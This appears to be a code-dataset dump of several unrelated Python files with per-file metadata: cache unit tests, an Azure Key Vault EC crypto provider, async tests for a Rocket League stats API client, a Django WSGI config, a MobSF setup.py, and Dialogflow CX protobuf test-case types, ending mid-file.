msg = ".setdefault(100, True) should return True, got %s" % str(ret_val)
self.assertEqual(ret_val, True, msg)
def testUpdate(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
kv_update = [(4, '****'), (5, 'V')]
a.update(kv_update)
expected_len = len(kv_list) + len(kv_update)
msg = (".update() should create length %d, got length %d"
% (expected_len, len(a)))
self.assertEqual(expected_len, len(a), msg)
# check actual contents
full_list = kv_list + kv_update
b = pyCacheBack(full_list, max_lru=10)
msg = ".update() didn't work, got dict '%s'" % str(a)
self.assertEqual(b, a, msg)
def testValues(self):
kv_list = [(1, 'one'), (2, 2), (3, 3.0)]
a = pyCacheBack(kv_list, max_lru=10)
expected_values = [kv[1] for kv in kv_list]
msg = (".values should return '%s', got '%s'"
% (str(expected_values), str(a.values())))
self.assertEqual(expected_values, list(a.values()), msg)
unittest.main()
| mit | 4,153,113,871,764,167,700 | 36.84596 | 85 | 0.506639 | false |
Azure/azure-sdk-for-python | sdk/keyvault/azure-keyvault-keys/azure/keyvault/keys/crypto/_providers/ec.py | 1 | 1586 | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from typing import TYPE_CHECKING
from .local_provider import LocalCryptographyProvider
from .._internal import EllipticCurveKey
from ... import KeyOperation, KeyType
if TYPE_CHECKING:
# pylint:disable=unused-import
from .local_provider import Algorithm
from .._internal import Key
from ... import JsonWebKey
_PRIVATE_KEY_OPERATIONS = frozenset((KeyOperation.decrypt, KeyOperation.sign, KeyOperation.unwrap_key))
class EllipticCurveCryptographyProvider(LocalCryptographyProvider):
def _get_internal_key(self, key):
# type: (JsonWebKey) -> Key
if key.kty not in (KeyType.ec, KeyType.ec_hsm):
raise ValueError('"key" must be an EC or EC-HSM key')
return EllipticCurveKey.from_jwk(key)
def supports(self, operation, algorithm):
# type: (KeyOperation, Algorithm) -> bool
if operation in _PRIVATE_KEY_OPERATIONS and not self._internal_key.is_private_key():
return False
if operation in (KeyOperation.decrypt, KeyOperation.encrypt):
return algorithm in self._internal_key.supported_encryption_algorithms
if operation in (KeyOperation.unwrap_key, KeyOperation.wrap_key):
return algorithm in self._internal_key.supported_key_wrap_algorithms
if operation in (KeyOperation.sign, KeyOperation.verify):
return algorithm in self._internal_key.supported_signature_algorithms
return False
| mit | -6,501,464,077,499,256,000 | 41.864865 | 103 | 0.680958 | false |
Drummersbrother/rocket-snake | tests/experiments.py | 1 | 7041 | import asyncio
import json
import time
import unittest
from pprint import pprint
import rocket_snake
with open("tests/config.json", "r") as config_file:
config = json.load(config_file)
def async_test(f):
def wrapper(*args, **kwargs):
future = f(*args, **kwargs)
loop = args[0].running_loop
loop.run_until_complete(future)
return wrapper
class AsyncTester(unittest.TestCase):
"""Test async code easily by inheriting from this."""
@staticmethod
def _do_async_code(coro):
return asyncio.get_event_loop().run_until_complete(coro)
def setUp(self, *args, **kwargs):
super().setUp()
self.running_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.running_loop)
self.time_track_stack = []
def tearDown(self, *args, **kwargs):
super().setUp()
if not self.running_loop.is_closed():
self.running_loop.close()
def time_track(self, text: object="Time taken was {0} seconds."):
if text is None:
self.time_track_stack.append(time.time())
else:
last_time = self.time_track_stack.pop()
time_delta = time.time() - last_time
print(text.format(round(time_delta, 3)))
return time_delta
class Tester(AsyncTester):
def setUp(self, *args, **kwargs):
super().setUp(*args, **kwargs)
self.executed_requests = 0
async def do_multiple(self, func, times: int = 10, text: str = "Time taken was {0} seconds."):
self.time_track(None)
tasks = [func() for i in range(times)]
tasks = await asyncio.gather(*tasks, loop=asyncio.get_event_loop(), return_exceptions=False)
gather_time = self.time_track("Time taken for {0} gather tasks was ".format(times) + "{0} seconds.")
print("That means an average of {0} milliseconds per gather request.".format(
round(1000 * (gather_time / times), 1)))
total_series_time = 0
for i in range(times):
self.time_track(None)
await func()
total_series_time += self.time_track(text)
print("Time taken for {0} series tasks was {1} seconds.".format(times, round(total_series_time, 3)))
print("That means an average of {0} milliseconds per series request.".format(
round(1000 * (total_series_time / times), 1)))
return times * 2
@async_test
async def test_data_endpoints(self):
self.time_track(None)
print("Testing data endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
print("Playlists:")
pprint(await client.get_playlists())
print("\nSeasons:")
pprint(await client.get_seasons())
print("\nPlatforms:")
pprint(await client.get_platforms())
print("\nTiers:")
pprint(await client.get_tiers())
print("\n")
self.executed_requests += 7
print("Done with testing data endpoints. Time taken was {0} seconds.".format(self.time_track("Time taken for data endpoints was {0} seconds.")))
@async_test
async def test_player_search(self):
self.time_track(None)
print("Testing player search.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Done with testing player search. Time taken was {0} seconds.".format(self.time_track("Time taken for player search was {0} seconds.")))
@async_test
async def test_player_endpoints(self):
self.time_track(None)
print("Testing player endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Me:")
self.time_track(None)
print(str(await client.get_player(config["steam_ids"][0], rocket_snake.constants.STEAM)))
self.time_track("Time taken for single player was {0} seconds.")
print("Loads a people:")
self.time_track(None)
pprint(await client.get_players(
list(zip(config["steam_ids"], [rocket_snake.constants.STEAM] * len(config["steam_ids"])))))
self.time_track("Time taken for batch players was {0} seconds.")
print("Done with testing player endpoints. Time taken was {0} seconds.§".format(self.time_track("Time taken for player endpoints was {0} seconds.")))
@async_test
async def test_platforms_throughput(self):
self.time_track(None)
print("Testing platforms data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_platforms, text="Platforms took {0} seconds.")
print("Done with platforms data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for platforms data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_tiers_throughput(self):
self.time_track(None)
print("Testing tiers data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_tiers, text="tiers took {0} seconds.")
print("Done with tiers data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for tiers data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_seasons_throughput(self):
self.time_track(None)
print("Testing seasons data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_seasons, text="seasons took {0} seconds.")
print("Done with seasons data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for seasons data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_playlists_throughput(self):
self.time_track(None)
print("Testing playlists data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_playlists, text="playlists took {0} seconds.")
print("Done with playlists data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for playlists data throughput was {0} seconds.") / done_requests), 1)))
| apache-2.0 | -4,465,343,280,217,194,500 | 37.26087 | 157 | 0.640767 | false |
yzheng624/Doolittle | doolittle/wsgi.py | 1 | 1428 | """
WSGI config for doolittle project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "doolittle.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "doolittle.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit | -3,612,763,795,554,017,300 | 43.625 | 79 | 0.794118 | false |
MobSF/Mobile-Security-Framework-MobSF | setup.py | 1 | 1749 | #!/usr/bin/env python3
"""Setup for MobSF."""
from setuptools import (
find_packages,
setup,
)
from pathlib import Path
def read(rel_path):
init = Path(__file__).resolve().parent / rel_path
return init.read_text('utf-8', 'ignore')
def get_version():
ver_path = 'mobsf/MobSF/init.py'
for line in read(ver_path).splitlines():
if line.startswith('VERSION'):
return line.split('\'')[1]
raise RuntimeError('Unable to find version string.')
description = (
'Mobile Security Framework (MobSF) is an automated,'
' all-in-one mobile application (Android/iOS/Windows) pen-testing,'
' malware analysis and security assessment framework capable of '
'performing static and dynamic analysis.')
setup(
name='mobsf',
version=get_version(),
description=description,
author='Ajin Abraham',
author_email='[email protected]',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 3.8',
'Topic :: Security',
'Topic :: Software Development :: Quality Assurance',
],
packages=find_packages(include=[
'mobsf', 'mobsf.*',
]),
include_package_data=True,
python_requires='>=3.8<=3.9',
entry_points={
'console_scripts': [
'mobsf = mobsf.__main__:main',
'mobsfdb = mobsf.__main__:db',
],
},
url='https://github.com/MobSF/Mobile-Security-Framework-MobSF',
long_description=read('README.md'),
long_description_content_type='text/markdown',
install_requires=Path('requirements.txt').read_text().splitlines(),
)
| gpl-3.0 | -4,701,759,006,805,439,000 | 27.672131 | 75 | 0.621498 | false |
googleapis/python-dialogflow-cx | google/cloud/dialogflowcx_v3/types/test_case.py | 1 | 37121 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.dialogflowcx_v3.types import flow as gcdc_flow
from google.cloud.dialogflowcx_v3.types import intent as gcdc_intent
from google.cloud.dialogflowcx_v3.types import page as gcdc_page
from google.cloud.dialogflowcx_v3.types import response_message
from google.cloud.dialogflowcx_v3.types import session
from google.cloud.dialogflowcx_v3.types import transition_route_group
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import struct_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.dialogflow.cx.v3",
manifest={
"TestResult",
"TestCase",
"TestCaseResult",
"TestConfig",
"ConversationTurn",
"TestRunDifference",
"TransitionCoverage",
"TransitionRouteGroupCoverage",
"IntentCoverage",
"CalculateCoverageRequest",
"CalculateCoverageResponse",
"ListTestCasesRequest",
"ListTestCasesResponse",
"BatchDeleteTestCasesRequest",
"CreateTestCaseRequest",
"UpdateTestCaseRequest",
"GetTestCaseRequest",
"RunTestCaseRequest",
"RunTestCaseResponse",
"RunTestCaseMetadata",
"BatchRunTestCasesRequest",
"BatchRunTestCasesResponse",
"BatchRunTestCasesMetadata",
"TestError",
"ImportTestCasesRequest",
"ImportTestCasesResponse",
"ImportTestCasesMetadata",
"TestCaseError",
"ExportTestCasesRequest",
"ExportTestCasesResponse",
"ExportTestCasesMetadata",
"ListTestCaseResultsRequest",
"ListTestCaseResultsResponse",
"GetTestCaseResultRequest",
},
)
class TestResult(proto.Enum):
r"""The test result for a test case and an agent environment."""
TEST_RESULT_UNSPECIFIED = 0
PASSED = 1
FAILED = 2
class TestCase(proto.Message):
r"""Represents a test case.
Attributes:
name (str):
The unique identifier of the test case.
[TestCases.CreateTestCase][google.cloud.dialogflow.cx.v3.TestCases.CreateTestCase]
will populate the name automatically. Otherwise use format:
``projects/<Project ID>/locations/<LocationID>/agents/ <AgentID>/testCases/<TestCase ID>``.
tags (Sequence[str]):
Tags are short descriptions that users may
apply to test cases for organizational and
filtering purposes. Each tag should start with
"#" and has a limit of 30 characters.
display_name (str):
Required. The human-readable name of the test
case, unique within the agent. Limit of 200
characters.
notes (str):
Additional freeform notes about the test
case. Limit of 400 characters.
test_config (google.cloud.dialogflowcx_v3.types.TestConfig):
Config for the test case.
test_case_conversation_turns (Sequence[google.cloud.dialogflowcx_v3.types.ConversationTurn]):
The conversation turns uttered when the test
case was created, in chronological order. These
include the canonical set of agent utterances
that should occur when the agent is working
properly.
creation_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. When the test was created.
last_test_result (google.cloud.dialogflowcx_v3.types.TestCaseResult):
The latest test result.
"""
name = proto.Field(proto.STRING, number=1,)
tags = proto.RepeatedField(proto.STRING, number=2,)
display_name = proto.Field(proto.STRING, number=3,)
notes = proto.Field(proto.STRING, number=4,)
test_config = proto.Field(proto.MESSAGE, number=13, message="TestConfig",)
test_case_conversation_turns = proto.RepeatedField(
proto.MESSAGE, number=5, message="ConversationTurn",
)
creation_time = proto.Field(
proto.MESSAGE, number=10, message=timestamp_pb2.Timestamp,
)
last_test_result = proto.Field(proto.MESSAGE, number=12, message="TestCaseResult",)
class TestCaseResult(proto.Message):
r"""Represents a result from running a test case in an agent
environment.
Attributes:
name (str):
The resource name for the test case result. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/ <TestCase ID>/results/<TestCaseResult ID>``.
environment (str):
Environment where the test was run. If not
set, it indicates the draft environment.
conversation_turns (Sequence[google.cloud.dialogflowcx_v3.types.ConversationTurn]):
The conversation turns uttered during the
test case replay in chronological order.
test_result (google.cloud.dialogflowcx_v3.types.TestResult):
Whether the test case passed in the agent
environment.
test_time (google.protobuf.timestamp_pb2.Timestamp):
The time that the test was run.
"""
name = proto.Field(proto.STRING, number=1,)
environment = proto.Field(proto.STRING, number=2,)
conversation_turns = proto.RepeatedField(
proto.MESSAGE, number=3, message="ConversationTurn",
)
test_result = proto.Field(proto.ENUM, number=4, enum="TestResult",)
test_time = proto.Field(proto.MESSAGE, number=5, message=timestamp_pb2.Timestamp,)
class TestConfig(proto.Message):
r"""Represents configurations for a test case.
Attributes:
tracking_parameters (Sequence[str]):
Session parameters to be compared when
calculating differences.
flow (str):
Flow name. If not set, default start flow is assumed.
Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
"""
tracking_parameters = proto.RepeatedField(proto.STRING, number=1,)
flow = proto.Field(proto.STRING, number=2,)
class ConversationTurn(proto.Message):
r"""One interaction between a human and virtual agent. The human
provides some input and the virtual agent provides a response.
Attributes:
user_input (google.cloud.dialogflowcx_v3.types.ConversationTurn.UserInput):
The user input.
virtual_agent_output (google.cloud.dialogflowcx_v3.types.ConversationTurn.VirtualAgentOutput):
The virtual agent output.
"""
class UserInput(proto.Message):
r"""The input from the human user.
Attributes:
input (google.cloud.dialogflowcx_v3.types.QueryInput):
Supports [text
input][google.cloud.dialogflow.cx.v3.QueryInput.text],
[event
input][google.cloud.dialogflow.cx.v3.QueryInput.event],
[dtmf input][google.cloud.dialogflow.cx.v3.QueryInput.dtmf]
in the test case.
injected_parameters (google.protobuf.struct_pb2.Struct):
Parameters that need to be injected into the
conversation during intent detection.
is_webhook_enabled (bool):
If webhooks should be allowed to trigger in
response to the user utterance. Often if
parameters are injected, webhooks should not be
enabled.
enable_sentiment_analysis (bool):
Whether sentiment analysis is enabled.
"""
input = proto.Field(proto.MESSAGE, number=5, message=session.QueryInput,)
injected_parameters = proto.Field(
proto.MESSAGE, number=2, message=struct_pb2.Struct,
)
is_webhook_enabled = proto.Field(proto.BOOL, number=3,)
enable_sentiment_analysis = proto.Field(proto.BOOL, number=7,)
class VirtualAgentOutput(proto.Message):
r"""The output from the virtual agent.
Attributes:
session_parameters (google.protobuf.struct_pb2.Struct):
The session parameters available to the bot
at this point.
differences (Sequence[google.cloud.dialogflowcx_v3.types.TestRunDifference]):
Output only. If this is part of a [result conversation
turn][TestCaseResult.conversation_turns], the list of
differences between the original run and the replay for this
output, if any.
diagnostic_info (google.protobuf.struct_pb2.Struct):
Required. Input only. The diagnostic
[info][Session.DetectIntentResponse.QueryResult.diagnostic_info]
output for the turn.
triggered_intent (google.cloud.dialogflowcx_v3.types.Intent):
The [Intent][google.cloud.dialogflow.cx.v3.Intent] that
triggered the response. Only name and displayName will be
set.
current_page (google.cloud.dialogflowcx_v3.types.Page):
The [Page][google.cloud.dialogflow.cx.v3.Page] on which the
utterance was spoken. Only name and displayName will be set.
text_responses (Sequence[google.cloud.dialogflowcx_v3.types.ResponseMessage.Text]):
The
[text][google.cloud.dialogflow.cx.v3.ResponseMessage.Text]
responses from the agent for the turn.
status (google.rpc.status_pb2.Status):
Response error from the agent in the test
result. If set, other output is empty.
"""
session_parameters = proto.Field(
proto.MESSAGE, number=4, message=struct_pb2.Struct,
)
differences = proto.RepeatedField(
proto.MESSAGE, number=5, message="TestRunDifference",
)
diagnostic_info = proto.Field(
proto.MESSAGE, number=6, message=struct_pb2.Struct,
)
triggered_intent = proto.Field(
proto.MESSAGE, number=7, message=gcdc_intent.Intent,
)
current_page = proto.Field(proto.MESSAGE, number=8, message=gcdc_page.Page,)
text_responses = proto.RepeatedField(
proto.MESSAGE, number=9, message=response_message.ResponseMessage.Text,
)
status = proto.Field(proto.MESSAGE, number=10, message=status_pb2.Status,)
user_input = proto.Field(proto.MESSAGE, number=1, message=UserInput,)
virtual_agent_output = proto.Field(
proto.MESSAGE, number=2, message=VirtualAgentOutput,
)
class TestRunDifference(proto.Message):
r"""The description of differences between original and replayed
agent output.
Attributes:
type_ (google.cloud.dialogflowcx_v3.types.TestRunDifference.DiffType):
The type of diff.
description (str):
A description of the diff, showing the actual
output vs expected output.
"""
class DiffType(proto.Enum):
r"""What part of the message replay differs from the test case."""
DIFF_TYPE_UNSPECIFIED = 0
INTENT = 1
PAGE = 2
PARAMETERS = 3
UTTERANCE = 4
type_ = proto.Field(proto.ENUM, number=1, enum=DiffType,)
description = proto.Field(proto.STRING, number=2,)
class TransitionCoverage(proto.Message):
r"""Transition coverage represents the percentage of all possible
page transitions (page-level transition routes and event
handlers, excluding transition route groups) present within any
of a parent's test cases.
Attributes:
transitions (Sequence[google.cloud.dialogflowcx_v3.types.TransitionCoverage.Transition]):
The list of Transitions present in the agent.
coverage_score (float):
The percent of transitions in the agent that
are covered.
"""
class TransitionNode(proto.Message):
r"""The source or target of a transition.
Attributes:
page (google.cloud.dialogflowcx_v3.types.Page):
Indicates a transition to a
[Page][google.cloud.dialogflow.cx.v3.Page]. Only some fields
such as name and displayname will be set.
flow (google.cloud.dialogflowcx_v3.types.Flow):
Indicates a transition to a
[Flow][google.cloud.dialogflow.cx.v3.Flow]. Only some fields
such as name and displayname will be set.
"""
page = proto.Field(
proto.MESSAGE, number=1, oneof="kind", message=gcdc_page.Page,
)
flow = proto.Field(
proto.MESSAGE, number=2, oneof="kind", message=gcdc_flow.Flow,
)
class Transition(proto.Message):
r"""A transition in a page.
Attributes:
source (google.cloud.dialogflowcx_v3.types.TransitionCoverage.TransitionNode):
The start node of a transition.
index (int):
The index of a transition in the transition
list. Starting from 0.
target (google.cloud.dialogflowcx_v3.types.TransitionCoverage.TransitionNode):
The end node of a transition.
covered (bool):
Whether or not the transition is covered by
at least one of the agent's test cases.
transition_route (google.cloud.dialogflowcx_v3.types.TransitionRoute):
Intent route or condition route.
event_handler (google.cloud.dialogflowcx_v3.types.EventHandler):
Event handler.
"""
source = proto.Field(
proto.MESSAGE, number=1, message="TransitionCoverage.TransitionNode",
)
index = proto.Field(proto.INT32, number=4,)
target = proto.Field(
proto.MESSAGE, number=2, message="TransitionCoverage.TransitionNode",
)
covered = proto.Field(proto.BOOL, number=3,)
transition_route = proto.Field(
proto.MESSAGE, number=5, oneof="detail", message=gcdc_page.TransitionRoute,
)
event_handler = proto.Field(
proto.MESSAGE, number=6, oneof="detail", message=gcdc_page.EventHandler,
)
transitions = proto.RepeatedField(proto.MESSAGE, number=1, message=Transition,)
coverage_score = proto.Field(proto.FLOAT, number=2,)
class TransitionRouteGroupCoverage(proto.Message):
r"""Transition route group coverage represents the percentage of
all possible transition routes present within any of a parent's
test cases. The results are grouped by the transition route
group.
Attributes:
coverages (Sequence[google.cloud.dialogflowcx_v3.types.TransitionRouteGroupCoverage.Coverage]):
Transition route group coverages.
coverage_score (float):
The percent of transition routes in all the
transition route groups that are covered.
"""
class Coverage(proto.Message):
r"""Coverage result message for one transition route group.
Attributes:
route_group (google.cloud.dialogflowcx_v3.types.TransitionRouteGroup):
Transition route group metadata. Only name
and displayName will be set.
transitions (Sequence[google.cloud.dialogflowcx_v3.types.TransitionRouteGroupCoverage.Coverage.Transition]):
The list of transition routes and coverage in
the transition route group.
coverage_score (float):
The percent of transition routes in the
transition route group that are covered.
"""
class Transition(proto.Message):
r"""A transition coverage in a transition route group.
Attributes:
transition_route (google.cloud.dialogflowcx_v3.types.TransitionRoute):
Intent route or condition route.
covered (bool):
Whether or not the transition route is
covered by at least one of the agent's test
cases.
"""
transition_route = proto.Field(
proto.MESSAGE, number=1, message=gcdc_page.TransitionRoute,
)
covered = proto.Field(proto.BOOL, number=2,)
route_group = proto.Field(
proto.MESSAGE,
number=1,
message=transition_route_group.TransitionRouteGroup,
)
transitions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="TransitionRouteGroupCoverage.Coverage.Transition",
)
coverage_score = proto.Field(proto.FLOAT, number=3,)
coverages = proto.RepeatedField(proto.MESSAGE, number=1, message=Coverage,)
coverage_score = proto.Field(proto.FLOAT, number=2,)
class IntentCoverage(proto.Message):
r"""Intent coverage represents the percentage of all possible
intents in the agent that are triggered in any of a parent's
test cases.
Attributes:
intents (Sequence[google.cloud.dialogflowcx_v3.types.IntentCoverage.Intent]):
The list of Intents present in the agent
coverage_score (float):
The percent of intents in the agent that are
covered.
"""
class Intent(proto.Message):
r"""The agent's intent.
Attributes:
intent (str):
The intent full resource name
covered (bool):
Whether or not the intent is covered by at
least one of the agent's test cases.
"""
intent = proto.Field(proto.STRING, number=1,)
covered = proto.Field(proto.BOOL, number=2,)
intents = proto.RepeatedField(proto.MESSAGE, number=1, message=Intent,)
coverage_score = proto.Field(proto.FLOAT, number=2,)
class CalculateCoverageRequest(proto.Message):
r"""The request message for
[TestCases.CalculateCoverage][google.cloud.dialogflow.cx.v3.TestCases.CalculateCoverage].
Attributes:
agent (str):
Required. The agent to calculate coverage for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
type_ (google.cloud.dialogflowcx_v3.types.CalculateCoverageRequest.CoverageType):
Required. The type of coverage requested.
"""
class CoverageType(proto.Enum):
r"""The type of coverage score requested."""
COVERAGE_TYPE_UNSPECIFIED = 0
INTENT = 1
PAGE_TRANSITION = 2
TRANSITION_ROUTE_GROUP = 3
agent = proto.Field(proto.STRING, number=3,)
type_ = proto.Field(proto.ENUM, number=2, enum=CoverageType,)
class CalculateCoverageResponse(proto.Message):
r"""The response message for
[TestCases.CalculateCoverage][google.cloud.dialogflow.cx.v3.TestCases.CalculateCoverage].
Attributes:
agent (str):
The agent to calculate coverage for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
intent_coverage (google.cloud.dialogflowcx_v3.types.IntentCoverage):
Intent coverage.
transition_coverage (google.cloud.dialogflowcx_v3.types.TransitionCoverage):
Transition (excluding transition route
groups) coverage.
route_group_coverage (google.cloud.dialogflowcx_v3.types.TransitionRouteGroupCoverage):
Transition route group coverage.
"""
agent = proto.Field(proto.STRING, number=5,)
intent_coverage = proto.Field(
proto.MESSAGE, number=2, oneof="coverage_type", message="IntentCoverage",
)
transition_coverage = proto.Field(
proto.MESSAGE, number=4, oneof="coverage_type", message="TransitionCoverage",
)
route_group_coverage = proto.Field(
proto.MESSAGE,
number=6,
oneof="coverage_type",
message="TransitionRouteGroupCoverage",
)
class ListTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.ListTestCases][google.cloud.dialogflow.cx.v3.TestCases.ListTestCases].
Attributes:
parent (str):
Required. The agent to list all pages for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
page_size (int):
The maximum number of items to return in a
single page. By default 20. Note that when
TestCaseView = FULL, the maximum page size
allowed is 20. When TestCaseView = BASIC, the
maximum page size allowed is 500.
page_token (str):
The next_page_token value returned from a previous list
request.
view (google.cloud.dialogflowcx_v3.types.ListTestCasesRequest.TestCaseView):
Specifies whether response should include all
fields or just the metadata.
"""
class TestCaseView(proto.Enum):
r"""Specifies how much test case information to include in the
response.
"""
TEST_CASE_VIEW_UNSPECIFIED = 0
BASIC = 1
FULL = 2
parent = proto.Field(proto.STRING, number=1,)
page_size = proto.Field(proto.INT32, number=2,)
page_token = proto.Field(proto.STRING, number=3,)
view = proto.Field(proto.ENUM, number=4, enum=TestCaseView,)
class ListTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.ListTestCases][google.cloud.dialogflow.cx.v3.TestCases.ListTestCases].
Attributes:
test_cases (Sequence[google.cloud.dialogflowcx_v3.types.TestCase]):
The list of test cases. There will be a maximum number of
items returned based on the page_size field in the request.
next_page_token (str):
Token to retrieve the next page of results,
or empty if there are no more results in the
list.
"""
@property
def raw_page(self):
return self
test_cases = proto.RepeatedField(proto.MESSAGE, number=1, message="TestCase",)
next_page_token = proto.Field(proto.STRING, number=2,)
class BatchDeleteTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.BatchDeleteTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchDeleteTestCases].
Attributes:
parent (str):
Required. The agent to delete test cases from. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
names (Sequence[str]):
Required. Format of test case names:
``projects/<Project ID>/locations/ <Location ID>/agents/<AgentID>/testCases/<TestCase ID>``.
"""
parent = proto.Field(proto.STRING, number=1,)
names = proto.RepeatedField(proto.STRING, number=3,)
class CreateTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.CreateTestCase][google.cloud.dialogflow.cx.v3.TestCases.CreateTestCase].
Attributes:
parent (str):
Required. The agent to create the test case for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
test_case (google.cloud.dialogflowcx_v3.types.TestCase):
Required. The test case to create.
"""
parent = proto.Field(proto.STRING, number=1,)
test_case = proto.Field(proto.MESSAGE, number=2, message="TestCase",)
class UpdateTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.UpdateTestCase][google.cloud.dialogflow.cx.v3.TestCases.UpdateTestCase].
Attributes:
test_case (google.cloud.dialogflowcx_v3.types.TestCase):
Required. The test case to update.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The mask to specify which fields should be
updated. The
[``creationTime``][google.cloud.dialogflow.cx.v3.TestCase.creation_time]
and
[``lastTestResult``][google.cloud.dialogflow.cx.v3.TestCase.last_test_result]
cannot be updated.
"""
test_case = proto.Field(proto.MESSAGE, number=1, message="TestCase",)
update_mask = proto.Field(
proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,
)
class GetTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.GetTestCase][google.cloud.dialogflow.cx.v3.TestCases.GetTestCase].
Attributes:
name (str):
Required. The name of the testcase. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>``.
"""
name = proto.Field(proto.STRING, number=1,)
class RunTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.RunTestCase][google.cloud.dialogflow.cx.v3.TestCases.RunTestCase].
Attributes:
name (str):
Required. Format of test case name to run:
``projects/<Project ID>/locations/ <Location ID>/agents/<AgentID>/testCases/<TestCase ID>``.
environment (str):
Optional. Environment name. If not set, draft environment is
assumed. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>``.
"""
name = proto.Field(proto.STRING, number=1,)
environment = proto.Field(proto.STRING, number=2,)
class RunTestCaseResponse(proto.Message):
r"""The response message for
[TestCases.RunTestCase][google.cloud.dialogflow.cx.v3.TestCases.RunTestCase].
Attributes:
result (google.cloud.dialogflowcx_v3.types.TestCaseResult):
The result.
"""
result = proto.Field(proto.MESSAGE, number=2, message="TestCaseResult",)
class RunTestCaseMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.RunTestCase][google.cloud.dialogflow.cx.v3.TestCases.RunTestCase]
long running operation.
"""
class BatchRunTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.BatchRunTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchRunTestCases].
Attributes:
parent (str):
Required. Agent name. Format:
``projects/<Project ID>/locations/<Location ID>/agents/ <AgentID>``.
environment (str):
Optional. If not set, draft environment is assumed. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>``.
test_cases (Sequence[str]):
Required. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>``.
"""
parent = proto.Field(proto.STRING, number=1,)
environment = proto.Field(proto.STRING, number=2,)
test_cases = proto.RepeatedField(proto.STRING, number=3,)
class BatchRunTestCasesResponse(proto.Message):
r"""The response message for
